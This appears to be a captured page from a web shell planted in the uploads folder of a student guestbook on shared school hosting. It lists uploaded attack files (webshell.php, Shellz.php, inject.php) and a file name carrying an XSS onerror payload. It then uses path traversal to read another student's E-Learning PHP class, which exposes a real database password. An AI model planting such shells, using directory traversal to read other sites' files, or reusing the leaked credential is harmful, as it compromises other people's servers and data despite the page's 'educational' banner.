📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../588742.klas4s23.mid-ica.nl/public_html/E-Learning/class/class.php

<?php class Database { private static $host = 'localhost'; private static $dbName = 'elearning'; private static $username = 'elearning'; private static $password = 'Yaido123!'; public static $conn = null; public static function conn() { if (self::$conn === null) { try { self::$conn = new PDO("mysql:host=" . self::$host . ";dbname=" . self::$dbName, self::$username, self::$password); self::$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { die("Fout bij verbinden: " . $e->getMessage()); } } return self::$conn; } } class Account { public static function userRegister() { if ($_SERVER["REQUEST_METHOD"] == "POST") { $username = trim($_POST['username']); $password = trim($_POST['password']); $checkedpass = trim($_POST['checked_pass']); if ($password === $checkedpass) { $hashed_password = password_hash($password, PASSWORD_DEFAULT); try { $sql = "INSERT INTO users (username, password) VALUES (:username, :password)"; $stmt = Database::conn()->prepare($sql); // Corrected to self:: $stmt->bindParam(':username', $username); $stmt->bindParam(':password', $hashed_password); if ($stmt->execute()) { echo "<script> alert('Succesvol geregistreerd!');</script>"; header('Location: login.php'); } else { echo "<script> alert('Er is iets misgegaan, probeer het opnieuw.');</script>"; } } catch (PDOException $e) { echo "Fout bij het verbinden met de database: " . $e->getMessage(); } } else { echo "<script> alert('Wachtwoorden zijn niet hetzelfde');</script>"; } } } public static function userLogin() { if ($_SERVER["REQUEST_METHOD"] == "POST") { $username = trim($_POST['username']); $password = trim($_POST['password']); $stmt = database::$conn->prepare("SELECT * FROM users WHERE username = :username"); $stmt->execute(['username' => $username]); $user = $stmt->fetch(); if ($user && password_verify($password, $user['password'])) { session_start(); $_SESSION['user_id'] = $user['user_id']; $_SESSION['username'] = $user['username']; header('Location: account.php'); exit; } else { $error = "Ongeldige gebruikersnaam of wachtwoord."; } } } public static function loginCheck() { if (!isset($_SESSION['username'])) { header('Location: login.php'); exit(); } } public static function changeName() { if ($_SERVER['REQUEST_METHOD'] == "POST") { $newName = htmlspecialchars($_POST['new_name']); $user_id = $_SESSION['user_id']; $sql = "UPDATE users SET username = :username WHERE user_id = :user_id"; $stmt = Database::$conn->prepare($sql); $stmt->execute(['username' => $newName, 'user_id' => $user_id]); $_SESSION['username'] = $newName; header("Location: account.php"); exit(); } } public static function changePassword() { if ($_SERVER['REQUEST_METHOD'] == "POST") { $newPassword = $_POST['new_password']; $user_id = $_SESSION['user_id']; $hashedPassword = password_hash($newPassword, PASSWORD_DEFAULT); $sql = "UPDATE users SET password = '$hashedPassword' WHERE user_id = $user_id"; $result = Database::$conn->query($sql); if ($result) { echo "Wachtwoord is veranderd!"; header("Location: account.php"); } else { echo "Er is iets fout gegaan!"; } } } } class Quiz { public static function addQuiz() { if ($_SERVER['REQUEST_METHOD'] === "POST") { $quiz_name = $_POST['quizName']; $difficulty = $_POST['difficulty']; $answers = $_POST["answers"]; $questions = $_POST["questions"]; $public = $_POST['public']; if (!empty($answers) && !empty($questions)) { if (count($answers) === count($questions)) { try { $sql = "INSERT INTO quizzes (name, difficulty, user_id, public) VALUES (:name, :difficulty, :user_id, :public)"; $stmt = Database::conn()->prepare($sql); $stmt->bindParam(':name', $quiz_name); $stmt->bindParam(':difficulty', $difficulty); $stmt->bindParam(':user_id', $_SESSION['user_id']); $stmt->bindParam(':public', $public); if ($stmt->execute()) { $quiz_id = Database::conn()->lastInsertId(); $questionSql = "INSERT INTO questions (quiz_id, question, correct_answer) VALUES (:quiz_id, :question, :correct_answer)"; $questionStmt = Database::conn()->prepare($questionSql); foreach ($questions as $index => $question) { $correct_answer = $answers[$index]; $questionStmt->bindParam(':quiz_id', $quiz_id); $questionStmt->bindParam(':question', $question); $questionStmt->bindParam(':correct_answer', $correct_answer); if (!$questionStmt->execute()) { echo "<script>alert('Er is iets misgegaan bij het toevoegen van de vragen.');</script>"; } } echo "<script>alert('Je quiz is succesvol toegevoegd!');</script>"; } else { echo "<script>alert('Er is iets misgegaan, probeer het opnieuw.');</script>"; } } catch (PDOException $e) { echo "Fout bij het verbinden met de database: " . $e->getMessage(); } } else { echo "Het aantal antwoorden komt niet overeen met het aantal vragen."; } } else { echo "De antwoorden en/of vragen mogen niet leeg zijn."; } } } public static function showOwnedQuizzes() { try { $sql = "SELECT quiz_id, user_id, name, difficulty FROM quizzes WHERE user_id = :id"; $stmt = Database::conn()->prepare($sql); $stmt->bindParam(':id', $_SESSION['user_id']); $stmt->execute(); $quizzes = $stmt->fetchAll(PDO::FETCH_ASSOC); $html = ""; if (!empty($quizzes)) { foreach ($quizzes as $quiz) { echo " <div class='quiz-card'> <div class='quiz-title'>" . htmlspecialchars($quiz['name']) . "</div> <a href='editQuiz.php?id=" . $quiz['quiz_id'] . "' class='start-btn'>Edit Quiz</a> </div>"; } } else { echo " <div>Je hebt nog geen quizzes</div> "; } return $html; } catch (PDOException $e) { echo "Fout bij het verbinden met de database: " . $e->getMessage(); } } public static function showAllQuizzes() { try { $sql = " SELECT quiz_id, user_id, name, difficulty FROM quizzes WHERE public = 'public' OR user_id = :user_id"; $stmt = Database::conn()->prepare($sql); $stmt->bindParam(':user_id', $_SESSION['user_id']); $stmt->execute(); $quizzes = $stmt->fetchAll(PDO::FETCH_ASSOC); if (!empty($quizzes)) { foreach ($quizzes as $quiz) { echo " <div class='quiz-card'> <div class='quiz-title'>" . htmlspecialchars($quiz['name']) . "</div> <a href='playQuiz.php?id=" . htmlspecialchars($quiz['quiz_id']) . "' class='start-btn'>Play Quiz</a> </div>"; } } else { echo " <div>Er zijn geen quizzes</div> <a href='createQuiz.php' class='start-btn'>Maak hier je eigen quiz aan</a> "; } } catch (PDOException $e) { echo "Fout bij het verbinden met de database: " . htmlspecialchars($e->getMessage()); } } public static function editQuiz() { if (!isset($_GET['id'])) { echo "Geen quiz geselecteerd."; exit; } $quiz_id = $_GET['id']; if ($_SERVER['REQUEST_METHOD'] === 'POST') { try { // Update quiz details $update_quiz_sql = "UPDATE quizzes SET name = :name, difficulty = :difficulty, public = :public WHERE quiz_id = :quiz_id"; $update_quiz_stmt = Database::conn()->prepare($update_quiz_sql); $update_quiz_stmt->bindParam(':name', $_POST['quizName']); $update_quiz_stmt->bindParam(':difficulty', $_POST['difficulty']); $update_quiz_stmt->bindParam(':quiz_id', $quiz_id); $update_quiz_stmt->bindParam(':public', $_POST['public']); $update_quiz_stmt->execute(); // Update each question or insert if it's new foreach ($_POST['questions'] as $index => $question) { $question_id = $_POST['question_ids'][$index]; $correct_answer = $_POST['answers'][$index]; if ($question_id === "new") { // Insert new question $insert_question_sql = "INSERT INTO questions (quiz_id, question, correct_answer) VALUES (:quiz_id, :question, :correct_answer)"; $insert_question_stmt = Database::conn()->prepare($insert_question_sql); $insert_question_stmt->bindParam(':quiz_id', $quiz_id); $insert_question_stmt->bindParam(':question', $question); $insert_question_stmt->bindParam(':correct_answer', $correct_answer); $insert_question_stmt->execute(); } else { // Update existing question $update_question_sql = "UPDATE questions SET question = :question, correct_answer = :correct_answer WHERE question_id = :question_id"; $update_question_stmt = Database::conn()->prepare($update_question_sql); $update_question_stmt->bindParam(':question', $question); $update_question_stmt->bindParam(':correct_answer', $correct_answer); $update_question_stmt->bindParam(':question_id', $question_id); $update_question_stmt->execute(); } } echo "<script>alert('Quiz succesvol bijgewerkt!');</script>"; } catch (PDOException $e) { echo "Fout bij het bijwerken van de quiz: " . $e->getMessage(); exit; } } try { $quiz_sql = "SELECT name, difficulty, public FROM quizzes WHERE quiz_id = :quiz_id"; $quiz_stmt = Database::conn()->prepare($quiz_sql); $quiz_stmt->bindParam(':quiz_id', $quiz_id); $quiz_stmt->execute(); $quiz = $quiz_stmt->fetch(PDO::FETCH_ASSOC); if (!$quiz) { echo "Quiz niet gevonden."; exit; } $questions_sql = "SELECT question_id, question, correct_answer FROM questions WHERE quiz_id = :quiz_id"; $stmt = Database::conn()->prepare($questions_sql); $stmt->bindParam(':quiz_id', $quiz_id); $stmt->execute(); $questions = $stmt->fetchAll(PDO::FETCH_ASSOC); if (empty($questions)) { echo "Geen vragen gevonden voor deze quiz."; exit; } return ['quiz' => $quiz, 'questions' => $questions, 'quiz_id' => $quiz_id]; } catch (PDOException $e) { echo "Fout bij het ophalen van quizgegevens: " . $e->getMessage(); exit; } } public static function quizCheck() { if (!isset($_GET['id'])) { echo "Geen quiz geselecteerd."; exit; } } public static function getQuizById($quiz_id) { try { // SQL queries voor quiz en vragen $sqlQuiz = "SELECT name, difficulty FROM quizzes WHERE quiz_id = :quiz_id"; $sqlQuestions = "SELECT question_id, question, correct_answer FROM questions WHERE quiz_id = :quiz_id"; // Haal de quizgegevens op $stmtQuiz = Database::conn()->prepare($sqlQuiz); $stmtQuiz->bindParam(':quiz_id', $quiz_id, PDO::PARAM_INT); $stmtQuiz->execute(); $quiz = $stmtQuiz->fetch(PDO::FETCH_ASSOC); // Haal de vragen op $stmtQuestions = Database::conn()->prepare($sqlQuestions); $stmtQuestions->bindParam(':quiz_id', $quiz_id, PDO::PARAM_INT); $stmtQuestions->execute(); $questions = $stmtQuestions->fetchAll(PDO::FETCH_ASSOC); $data = ['quiz' => $quiz, 'questions' => $questions]; return $data; } catch (PDOException $e) { echo "Fout bij het ophalen van quizgegevens: " . $e->getMessage(); return false; } } public static function showQuiz($quiz, $questions) { if ($quiz) { // Start de sessie als die nog niet gestart is if (session_status() == PHP_SESSION_NONE) { session_start(); } // Initialiseer sessievariabelen als die niet bestaan if (!isset($_SESSION['current_question'])) { $_SESSION['current_question'] = 0; // Begin bij de eerste vraag $_SESSION['score'] = 0; // Score initialiseren } // Controleer of er een antwoord is ingediend if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['answer'], $_POST['question_id'])) { $currentIndex = $_SESSION['current_question']; $currentQuestion = $questions[$currentIndex]; // Controleer het antwoord $userAnswer = trim($_POST['answer']); if (strcasecmp($userAnswer, $currentQuestion['correct_answer']) === 0) { $_SESSION['score']++; // Verhoog score als het antwoord correct is } // Ga naar de volgende vraag $_SESSION['current_question']++; } // Verkrijg de index van de huidige vraag $currentIndex = $_SESSION['current_question']; // Toon de huidige vraag of het resultaat if ($currentIndex < count($questions)) { $currentQuestion = $questions[$currentIndex]; // HTML voor de huidige vraag echo "<div class='container'>"; echo "<h2>" . htmlspecialchars($quiz['name']) . "</h2>"; echo "<p>Difficulty: " . htmlspecialchars($quiz['difficulty']) . "</p>"; echo "<div class='vraag'>"; echo "<label>" . htmlspecialchars($currentQuestion['question']) . "</label>"; echo "<form method='post' class='quiz-form' action=''>"; echo "<input type='text' class='answer-input' name='answer' data-question-id='" . $currentQuestion['question_id'] . "' placeholder='Uw antwoord' required>"; echo "<input type='hidden' name='question_id' value='" . $currentQuestion['question_id'] . "'>"; echo "<button type='submit'>Antwoord versturen</button>"; echo "</form>"; echo "</div>"; // Sluit de vraag echo "<span id='result-" . $currentQuestion['question_id'] . "' class='feedback'></span>"; echo "</div>"; // Sluit de container } else { // Toon het eindresultaat echo "<div class='result-overview'>"; echo "<h3>Quiz Overzicht</h3>"; echo "<p>Je hebt " . $_SESSION['score'] . " van de " . count($questions) . " vragen goed!</p>"; echo "<a href='startQuiz.php'>Speel nog een quiz</a>"; echo "</div>"; // Reset de sessie unset($_SESSION['current_question']); unset($_SESSION['score']); } } else { echo "<p>Deze quiz bestaat niet.</p>"; } } public static function switchQuestionsAndAnswers($quiz_id) { $data = self::getQuizById($quiz_id); // alle vragen zitten nu in de $questions array // nu willen wij de vragen en antwoorden omwisselen in de array zelf foreach ($data['questions'] as $index => $question) { // Swap 'question' and 'correct_answer' for this question $temp = $question['question']; $question['question'] = $question['correct_answer']; $question['correct_answer'] = $temp; $data['questions'][$index] = $question; } return $data; } public static function checkAnswer() { if ($_SERVER['REQUEST_METHOD'] === 'POST') { $question_id = isset($_POST['question_id']) ? $_POST['question_id'] : null; $user_answer = isset($_POST['answer']) ? trim($_POST['answer']) : null; if ($question_id && $user_answer) { try { $sql = "SELECT correct_answer FROM questions WHERE question_id = :question_id"; $stmt = Database::conn()->prepare($sql); $stmt->bindParam(':question_id', $question_id, PDO::PARAM_INT); $stmt->execute(); $result = $stmt->fetch(PDO::FETCH_ASSOC); if ($result) { $correct_answer = trim($result['correct_answer']); $is_correct = strcasecmp($user_answer, $correct_answer) === 0; $response = [ 'status' => 'success', 'is_correct' => $is_correct, 'correct_answer' => $correct_answer ]; } else { $response = ['status' => 'error', 'message' => 'Vraag niet gevonden.']; } } catch (PDOException $e) { $response = ['status' => 'error', 'message' => 'Databasefout: ' . $e->getMessage()]; } } else { $response = ['status' => 'error', 'message' => 'Onvolledige invoerdata.']; } echo json_encode($response); // Stuur het resultaat als JSON terug } } }

🎯 Available Actions

⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!

🐚 WEB SHELL ACTIVATED

📁 File Browser

📄 Viewing: ../../../../588742.klas4s23.mid-ica.nl/public_html/E-Learning/class/class.php

🎯 Available Actions

Command Execution:

Quick Commands:

File Operations: